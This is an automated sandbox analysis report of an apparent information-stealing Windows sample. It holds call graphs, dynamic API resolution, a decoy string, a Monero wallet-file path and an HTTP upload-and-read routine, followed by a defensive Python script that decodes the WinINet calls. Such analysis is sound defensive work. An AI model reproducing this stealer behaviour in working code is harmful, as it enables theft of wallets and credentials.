lstrcpy 14670->14671 14672 914a51 14671->14672 14673 92a9b0 4 API calls 14672->14673 14674 914a7d 14673->14674 14675 92a920 3 API calls 14674->14675 14676 914a84 14675->14676 14677 92a8a0 lstrcpy 14676->14677 14678 914a8d 14677->14678 14679 914aa3 InternetConnectA 14678->14679 14679->14635 14680 914ad3 HttpOpenRequestA 14679->14680 14682 914b28 14680->14682 14683 914ebe InternetCloseHandle 14680->14683 14684 92a9b0 4 API calls 14682->14684 14683->14635 14685 914b3c 14684->14685 14686 92a8a0 lstrcpy 14685->14686 14687 914b45 14686->14687 14688 92a920 3 API calls 14687->14688 14689 914b63 14688->14689 14690 92a8a0 lstrcpy 14689->14690 14691 914b6c 14690->14691 14692 92a9b0 4 API calls 14691->14692 14693 914b8b 14692->14693 14694 92a8a0 lstrcpy 14693->14694 14695 914b94 14694->14695 14696 92a9b0 4 API calls 14695->14696 14697 914bb5 14696->14697 14698 92a8a0 lstrcpy 14697->14698 14699 914bbe 14698->14699 14700 92a9b0 4 API calls 14699->14700 14701 914bde 14700->14701 14702 92a8a0 lstrcpy 14701->14702 14703 914be7 14702->14703 14704 92a9b0 4 API calls 14703->14704 14705 914c06 14704->14705 14706 92a8a0 lstrcpy 14705->14706 14707 914c0f 14706->14707 14708 92a920 3 API calls 14707->14708 14709 914c2d 14708->14709 14710 92a8a0 lstrcpy 14709->14710 14711 914c36 14710->14711 14712 92a9b0 4 API calls 14711->14712 14713 914c55 14712->14713 14714 92a8a0 lstrcpy 14713->14714 14715 914c5e 14714->14715 14716 92a9b0 4 API calls 14715->14716 14717 914c7d 14716->14717 14718 92a8a0 lstrcpy 14717->14718 14719 914c86 14718->14719 14720 92a920 3 API calls 14719->14720 14721 914ca4 14720->14721 14722 92a8a0 lstrcpy 14721->14722 14723 914cad 14722->14723 14724 92a9b0 4 API calls 14723->14724 14725 914ccc 14724->14725 14726 92a8a0 lstrcpy 14725->14726 14727 914cd5 14726->14727 14728 92a9b0 4 API calls 14727->14728 14729 914cf6 14728->14729 14730 92a8a0 lstrcpy 14729->14730 14731 914cff 14730->14731 14732 92a9b0 4 API calls 14731->14732 14733 914d1f 14732->14733 14734 92a8a0 lstrcpy 
14733->14734 14735 914d28 14734->14735 14736 92a9b0 4 API calls 14735->14736 14737 914d47 14736->14737 14738 92a8a0 lstrcpy 14737->14738 14739 914d50 14738->14739 14740 92a920 3 API calls 14739->14740 14741 914d6e 14740->14741 14742 92a8a0 lstrcpy 14741->14742 14743 914d77 14742->14743 14744 92a740 lstrcpy 14743->14744 14745 914d92 14744->14745 14746 92a920 3 API calls 14745->14746 14747 914db3 14746->14747 14748 92a920 3 API calls 14747->14748 14749 914dba 14748->14749 14750 92a8a0 lstrcpy 14749->14750 14751 914dc6 14750->14751 14752 914de7 lstrlen 14751->14752 14753 914dfa 14752->14753 14754 914e03 lstrlen 14753->14754 15693 92aad0 14754->15693 14756 914e13 HttpSendRequestA 14757 914e32 InternetReadFile 14756->14757 14758 914e67 InternetCloseHandle 14757->14758 14763 914e5e 14757->14763 14760 92a800 14758->14760 14760->14683 14761 92a9b0 4 API calls 14761->14763 14762 92a8a0 lstrcpy 14762->14763 14763->14757 14763->14758 14763->14761 14763->14762 15700 92aad0 14764->15700 14766 9217c4 StrCmpCA 14767 9217d7 14766->14767 14768 9217cf ExitProcess 14766->14768 14769 9219c2 14767->14769 14770 921932 StrCmpCA 14767->14770 14771 921913 StrCmpCA 14767->14771 14772 921970 StrCmpCA 14767->14772 14773 9218f1 StrCmpCA 14767->14773 14774 921951 StrCmpCA 14767->14774 14775 92187f StrCmpCA 14767->14775 14776 92185d StrCmpCA 14767->14776 14777 9218cf StrCmpCA 14767->14777 14778 9218ad StrCmpCA 14767->14778 14779 92a820 lstrlen lstrcpy 14767->14779 14769->13687 14770->14767 14771->14767 14772->14767 14773->14767 14774->14767 14775->14767 14776->14767 14777->14767 14778->14767 14779->14767 14781 92a7a0 lstrcpy 14780->14781 14782 915979 14781->14782 14783 9147b0 2 API calls 14782->14783 14784 915985 14783->14784 14785 92a740 lstrcpy 14784->14785 14786 9159ba 14785->14786 14787 92a740 lstrcpy 14786->14787 14788 9159c7 14787->14788 14789 92a740 lstrcpy 14788->14789 14790 9159d4 14789->14790 14791 92a740 lstrcpy 14790->14791 14792 9159e1 14791->14792 14793 92a740 lstrcpy 14792->14793 
14794 9159ee InternetOpenA StrCmpCA 14793->14794 14795 915a1d 14794->14795 14796 915fc3 InternetCloseHandle 14795->14796 14798 928b60 3 API calls 14795->14798 14797 915fe0 14796->14797 14800 919ac0 4 API calls 14797->14800 14799 915a3c 14798->14799 14801 92a920 3 API calls 14799->14801 14803 915fe6 14800->14803 14802 915a4f 14801->14802 14804 92a8a0 lstrcpy 14802->14804 14805 92a820 2 API calls 14803->14805 14807 91601f codecvt 14803->14807 14809 915a58 14804->14809 14806 915ffd 14805->14806 14808 92a9b0 4 API calls 14806->14808 14811 92a7a0 lstrcpy 14807->14811 14810 916013 14808->14810 14813 92a9b0 4 API calls 14809->14813 14812 92a8a0 lstrcpy 14810->14812 14822 91604f 14811->14822 14812->14807 14814 915a82 14813->14814 14815 92a8a0 lstrcpy 14814->14815 14816 915a8b 14815->14816 14817 92a9b0 4 API calls 14816->14817 14818 915aaa 14817->14818 14819 92a8a0 lstrcpy 14818->14819 14820 915ab3 14819->14820 14821 92a920 3 API calls 14820->14821 14823 915ad1 14821->14823 14822->13693 14824 92a8a0 lstrcpy 14823->14824 14825 915ada 14824->14825 14826 92a9b0 4 API calls 14825->14826 14827 915af9 14826->14827 14828 92a8a0 lstrcpy 14827->14828 14829 915b02 14828->14829 14830 92a9b0 4 API calls 14829->14830 14831 915b21 14830->14831 14832 92a8a0 lstrcpy 14831->14832 14833 915b2a 14832->14833 14834 92a9b0 4 API calls 14833->14834 14835 915b56 14834->14835 14836 92a920 3 API calls 14835->14836 14837 915b5d 14836->14837 14838 92a8a0 lstrcpy 14837->14838 14839 915b66 14838->14839 14840 915b7c InternetConnectA 14839->14840 14840->14796 14841 915bac HttpOpenRequestA 14840->14841 14843 915fb6 InternetCloseHandle 14841->14843 14844 915c0b 14841->14844 14843->14796 14845 92a9b0 4 API calls 14844->14845 14846 915c1f 14845->14846 14847 92a8a0 lstrcpy 14846->14847 14848 915c28 14847->14848 14849 92a920 3 API calls 14848->14849 14850 915c46 14849->14850 14851 92a8a0 lstrcpy 14850->14851 14852 915c4f 14851->14852 14853 92a9b0 4 API calls 14852->14853 14854 915c6e 14853->14854 14855 92a8a0 

                                        Control-flow Graph

                                        control_flow_graph 660 929860-929874 call 929750 663 929a93-929af2 LoadLibraryA * 5 660->663 664 92987a-929a8e call 929780 GetProcAddress * 21 660->664 665 929af4-929b08 GetProcAddress 663->665 666 929b0d-929b14 663->666 664->663 665->666 668 929b46-929b4d 666->668 669 929b16-929b41 GetProcAddress * 2 666->669 671 929b68-929b6f 668->671 672 929b4f-929b63 GetProcAddress 668->672 669->668 673 929b71-929b84 GetProcAddress 671->673 674 929b89-929b90 671->674 672->671 673->674 675 929b92-929bbc GetProcAddress * 2 674->675 676 929bc1-929bc2 674->676 675->676
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,006B2428), ref: 009298A1
                                        • GetProcAddress.KERNEL32(74DD0000,006B2230), ref: 009298BA
                                        • GetProcAddress.KERNEL32(74DD0000,006B22A8), ref: 009298D2
                                        • GetProcAddress.KERNEL32(74DD0000,006B22C0), ref: 009298EA
                                        • GetProcAddress.KERNEL32(74DD0000,006B2368), ref: 00929903
                                        • GetProcAddress.KERNEL32(74DD0000,006B8F28), ref: 0092991B
                                        • GetProcAddress.KERNEL32(74DD0000,006A59F0), ref: 00929933
                                        • GetProcAddress.KERNEL32(74DD0000,006A5A90), ref: 0092994C
                                        • GetProcAddress.KERNEL32(74DD0000,006B2218), ref: 00929964
                                        • GetProcAddress.KERNEL32(74DD0000,006B23F8), ref: 0092997C
                                        • GetProcAddress.KERNEL32(74DD0000,006B24E8), ref: 00929995
                                        • GetProcAddress.KERNEL32(74DD0000,006B2458), ref: 009299AD
                                        • GetProcAddress.KERNEL32(74DD0000,006A5870), ref: 009299C5
                                        • GetProcAddress.KERNEL32(74DD0000,006B24D0), ref: 009299DE
                                        • GetProcAddress.KERNEL32(74DD0000,006B2398), ref: 009299F6
                                        • GetProcAddress.KERNEL32(74DD0000,006A56B0), ref: 00929A0E
                                        • GetProcAddress.KERNEL32(74DD0000,006B2320), ref: 00929A27
                                        • GetProcAddress.KERNEL32(74DD0000,006B22D8), ref: 00929A3F
                                        • GetProcAddress.KERNEL32(74DD0000,006A5A10), ref: 00929A57
                                        • GetProcAddress.KERNEL32(74DD0000,006B2278), ref: 00929A70
                                        • GetProcAddress.KERNEL32(74DD0000,006A56D0), ref: 00929A88
                                        • LoadLibraryA.KERNEL32(006B22F0,?,00926A00), ref: 00929A9A
                                        • LoadLibraryA.KERNEL32(006B24B8,?,00926A00), ref: 00929AAB
                                        • LoadLibraryA.KERNEL32(006B2308,?,00926A00), ref: 00929ABD
                                        • LoadLibraryA.KERNEL32(006B2338,?,00926A00), ref: 00929ACF
                                        • LoadLibraryA.KERNEL32(006B23B0,?,00926A00), ref: 00929AE0
                                        • GetProcAddress.KERNEL32(75A70000,006B2440), ref: 00929B02
                                        • GetProcAddress.KERNEL32(75290000,006B23C8), ref: 00929B23
                                        • GetProcAddress.KERNEL32(75290000,006B23E0), ref: 00929B3B
                                        • GetProcAddress.KERNEL32(75BD0000,006B2410), ref: 00929B5D
                                        • GetProcAddress.KERNEL32(75450000,006A5810), ref: 00929B7E
                                        • GetProcAddress.KERNEL32(76E90000,006B8F38), ref: 00929B9F
                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00929BB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: #k$($k$0"k$8#k$@$k$NtQueryInformationProcess$X$k$h#k$pXj$x"k$#k$$k
                                        • API String ID: 2238633743-89275038
                                        • Opcode ID: 3d6111ae639a723487fc5ec958ab44fa5a76e3f4567599e136081c135c037089
                                        • Instruction ID: 7149d25357b407c0fde790e44ab5615a775ae814aad6026a47980cd29816527b
                                        • Opcode Fuzzy Hash: 3d6111ae639a723487fc5ec958ab44fa5a76e3f4567599e136081c135c037089
                                        • Instruction Fuzzy Hash: E9A128B5500344AFD344EFA8FD98B663BF9F78C303B14479AA705A3264DE39A841CB52

                                        Control-flow Graph

                                        control_flow_graph 764 9145c0-914695 RtlAllocateHeap 781 9146a0-9146a6 764->781 782 9146ac-91474a 781->782 783 91474f-9147a9 VirtualProtect 781->783 782->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0091460F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0091479C
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146D8, 00914770, 009146C2, 0091475A, 00914662, 0091471E, 0091474F, 0091466D, 00914657, 009145D2, 00914643, 00914734, 00914683, 0091477B, 009145F3, 009146CD, 009145C7, 00914729, 00914622, 00914617, 00914713, 0091473F, 009145E8, 00914678, 00914765
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0091462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146AC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009145DD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009146B7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00914638
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the report's String ID field repeats this one sentence, '$'-separated, once per occurrence; the identical copies are collapsed here)
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: 708039367ef77192452d39cf244b629d9492e6deda605ffdbcdb63681da840d3
                                        • Instruction ID: 473d94282e7638cec5659b7e61da910e596f5b7915ecd13e8d5fd6685e20612f
                                        • Opcode Fuzzy Hash: 708039367ef77192452d39cf244b629d9492e6deda605ffdbcdb63681da840d3
                                        • Instruction Fuzzy Hash: D24137716C66047FE62AB7E78B42E9D72575FDA70EF93794CEA0052280CBF075086D22

                                        Control-flow Graph

                                        control_flow_graph 801 914880-914942 call 92a7a0 call 9147b0 call 92a740 * 5 InternetOpenA StrCmpCA 816 914944 801->816 817 91494b-91494f 801->817 816->817 818 914955-914acd call 928b60 call 92a920 call 92a8a0 call 92a800 * 2 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a920 call 92a8a0 call 92a800 * 2 InternetConnectA 817->818 819 914ecb-914ef3 InternetCloseHandle call 92aad0 call 919ac0 817->819 818->819 905 914ad3-914ad7 818->905 829 914f32-914fa2 call 928990 * 2 call 92a7a0 call 92a800 * 8 819->829 830 914ef5-914f2d call 92a820 call 92a9b0 call 92a8a0 call 92a800 819->830 830->829 906 914ae5 905->906 907 914ad9-914ae3 905->907 908 914aef-914b22 HttpOpenRequestA 906->908 907->908 909 914b28-914e28 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a740 call 92a920 * 2 call 92a8a0 call 92a800 * 2 call 92aad0 lstrlen call 92aad0 * 2 lstrlen call 92aad0 HttpSendRequestA 908->909 910 914ebe-914ec5 InternetCloseHandle 908->910 1021 914e32-914e5c InternetReadFile 909->1021 910->819 1022 914e67-914eb9 InternetCloseHandle call 92a800 1021->1022 1023 914e5e-914e65 1021->1023 1022->910 1023->1022 1024 914e69-914ea7 call 92a9b0 call 92a8a0 call 92a800 1023->1024 1024->1021
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                          • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00914915
                                        • StrCmpCA.SHLWAPI(?,006BEAA8), ref: 0091493A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00914ABA
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00930DDB,00000000,?,?,00000000,?,",00000000,?,006BEA88), ref: 00914DE8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00914E04
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00914E18
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00914E49
                                        • InternetCloseHandle.WININET(00000000), ref: 00914EAD
                                        • InternetCloseHandle.WININET(00000000), ref: 00914EC5
                                        • HttpOpenRequestA.WININET(00000000,006BEA78,?,006BE230,00000000,00000000,00400100,00000000), ref: 00914B15
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00914ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------$0k$hk$xk
                                        • API String ID: 460715078-3059890706
                                        • Opcode ID: c27c94acfec7f380b88632f1a7da88f9383c7911dddb147c334e0f1b9896b33a
                                        • Instruction ID: dac3edc1f8bcd7e1d41c35c523c3749dda5c2139c6d52137a5d84d4e5e8b164c
                                        • Opcode Fuzzy Hash: c27c94acfec7f380b88632f1a7da88f9383c7911dddb147c334e0f1b9896b33a
                                        • Instruction Fuzzy Hash: BA12BD729112289BDB15EB90EC92FEEB778BF98300F504199F10662095DF702F89CF66
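The APIs list above records a complete WinINet session (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, three InternetCloseHandle calls) with the raw argument values the sandbox captured, but printed out of address order and with the numeric constants undecoded. The following script is an added example, not part of the Joe Sandbox report or of the sample: it parses those call lines (copied from the list above as constructed input; the "Part of subcall" entries are left out), sorts them by the `ref` address, decodes the WinINet constants from wininet.h, and reports what the session looks like on the wire. The `summarize` and `follows_wininet_sequence` helpers and the summary field names are this example's own choices.

```python
import re

# Constructed sample input: the routine's direct WinINet calls, copied as printed
# in the report's APIs list for the function at 0x914880. "?" marks an argument
# the sandbox could not resolve; 00000000 is a NULL pointer or a zero value.
API_LINES = [
    "InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00914915",
    "InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00914ABA",
    "HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00914E18",
    "InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00914E49",
    "InternetCloseHandle.WININET(00000000), ref: 00914EAD",
    "InternetCloseHandle.WININET(00000000), ref: 00914EC5",
    "HttpOpenRequestA.WININET(00000000,006BEA78,?,006BE230,00000000,00000000,00400100,00000000), ref: 00914B15",
    "InternetCloseHandle.WININET(00000000), ref: 00914ECF",
]

LINE = re.compile(r"^(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")

# Constants from wininet.h (values, not names, are what the sandbox prints).
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
              3: "INTERNET_OPEN_TYPE_PROXY", 4: "INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# The order in which a WinINet HTTP client must make these calls.
WININET_SEQUENCE = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                    "HttpSendRequestA", "InternetReadFile"]


def parse_call(line):
    """Split one 'Api.DLL(args), ref: addr' line; unresolved '?' arguments become None."""
    m = LINE.match(line.strip())
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    args = [None if a == "?" else int(a, 16) for a in m["args"].split(",")] if m["args"] else []
    return {"api": m["api"], "dll": m["dll"], "args": args, "ref": int(m["ref"], 16)}


def decode_flags(value, table):
    """Name every known bit set in value; any unknown remainder is kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names


def follows_wininet_sequence(call_order):
    """True when the five session-building calls appear, and in the documented order."""
    positions = [call_order.index(api) for api in WININET_SEQUENCE if api in call_order]
    return len(positions) == len(WININET_SEQUENCE) and positions == sorted(positions)


def summarize(lines):
    """Decode the session: who it talks to (as far as captured), how, and over what."""
    calls = sorted((parse_call(line) for line in lines), key=lambda c: c["ref"])
    first = {}
    for call in calls:
        first.setdefault(call["api"], call)  # earliest call site of each API
    open_args = first["InternetOpenA"]["args"]
    conn_args = first["InternetConnectA"]["args"]
    req_args = first["HttpOpenRequestA"]["args"]
    read_args = first["InternetReadFile"]["args"]
    flags = decode_flags(req_args[6], REQUEST_FLAGS)
    return {
        "call_order": [c["api"] for c in calls],
        "user_agent": "none (NULL lpszAgent)" if open_args[0] == 0 else "set",
        "access_type": OPEN_TYPES.get(open_args[1], f"0x{open_args[1]:X}"),
        "service": SERVICES.get(conn_args[5], f"0x{conn_args[5]:X}"),
        "port": conn_args[2],            # None: the sandbox printed '?'
        "request_flags": flags,
        "tls": "INTERNET_FLAG_SECURE" in flags,
        "read_chunk_bytes": read_args[2],
        "handles_closed": sum(1 for c in calls if c["api"] == "InternetCloseHandle"),
    }


if __name__ == "__main__":
    for key, value in summarize(API_LINES).items():
        print(f"{key}: {value}")
```

Sorting by `ref` matters because the report lists HttpOpenRequestA after the InternetCloseHandle calls even though it executes between InternetConnectA and HttpSendRequestA. The decoded values are what a detection engineer needs from this block: a NULL `lpszAgent` (so no User-Agent header is supplied), direct access with no proxy, `INTERNET_SERVICE_HTTP`, request flags `INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE` with `INTERNET_FLAG_SECURE` absent (plaintext HTTP), and a 0x7CF-byte (1999-byte) InternetReadFile buffer, which together with the back edge 1024->1021 in the control-flow graph is the response read loop. The host and port are `?` in the capture and are not guessed here.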
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
